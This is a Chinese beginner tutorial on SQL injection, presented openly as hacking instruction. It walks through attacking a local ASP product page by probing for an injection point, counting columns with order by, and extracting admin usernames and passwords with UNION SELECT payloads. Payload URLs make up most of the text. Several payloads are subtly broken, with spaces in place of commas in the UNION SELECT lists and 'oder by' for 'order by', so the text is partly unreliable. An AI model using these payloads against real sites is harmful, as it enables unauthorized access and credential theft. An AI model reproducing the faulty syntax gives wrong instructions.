sql注入攻击属于什么漏洞利用(菜鸟详细讲解sql注入漏洞原理之攻击)
sql注入攻击属于什么漏洞利用(菜鸟详细讲解sql注入漏洞原理之攻击)二、开始sql注入攻击and 1=1 和and 1=2 返回不同页面就是存在sql注入在id后面加'号,如果出现错误提示,则该网站可能就存在注入漏洞。http://127.0.0.1:88/0/Production/PRODUCT_DETAIL.asp?id=1392 and 1=1http://127.0.0.1:88/0/Production/PRODUCT_DETAIL.asp?id=1392 and 1=2
sql注入: 应用程序在向后台数据库传递SQL( Structured Query Language 结构化查询语言 )查询时,如果攻击者提供了影响该查询的能力,就会引发SQL注入。SQL注入不只是一种会影响Web应用的漏洞,对于任何从不可信源获取输入的代码来说,如果使用输入来构造动态SQL语句,就有可能也会受到攻击。
1. 判断是不是注入点
下面还是具体拿个实例来给大家演示下,目标站:http://127.0.0.1:88/0/Production/PRODUCT_DETAIL.asp?id=1392,在网址后面加 '
http://127.0.0.1:88/0/Production/PRODUCT_DETAIL.asp?id=1392'
在id后面加'号,如果出现错误提示,则该网站可能就存在注入漏洞。
http://127.0.0.1:88/0/Production/PRODUCT_DETAIL.asp?id=1392 and 1=1
http://127.0.0.1:88/0/Production/PRODUCT_DETAIL.asp?id=1392 and 1=2
and 1=1 和and 1=2 返回不同页面就是存在sql注入
二、开始sql注入攻击
判断字段
oder by XX
http://127.0.0.1:88/0/Production/PRODUCT_DETAIL.asp?id=1392 order by 23
http://127.0.0.1:88/0/Production/PRODUCT_DETAIL.asp?id=1392 order by 22
22正确,23错误。说明存在22个字段
三、猜解表名(一般admin,user,username 也就极品管理员随意设置的)
http://127.0.0.1:88/0/Production/PRODUCT_DETAIL.asp?id=1392 UNION SELECT 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 from admin
存在admin表明,并且爆出数字3和15
我们随便输入一个表名看下
http://127.0.0.1:88/0/Production/PRODUCT_DETAIL.asp?id=1392 UNION SELECT 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 from user
出错,说明不存在user表
四、猜解列名内容
我们根据爆出的数字填写列名(admin username password)
http://127.0.0.1:88/0/Production/PRODUCT_DETAIL.asp?id=1392 UNION SELECT 1 2 admin 4 5 6 7 8 9 10 11 12 13 14 password 16 17 18 19 20 21 22 from admin
很简单吧,几条几句就可以查询到账号密码
喜欢学习黑客技术的可以关注我,
每天都会有相应的教程发布。
谢谢大家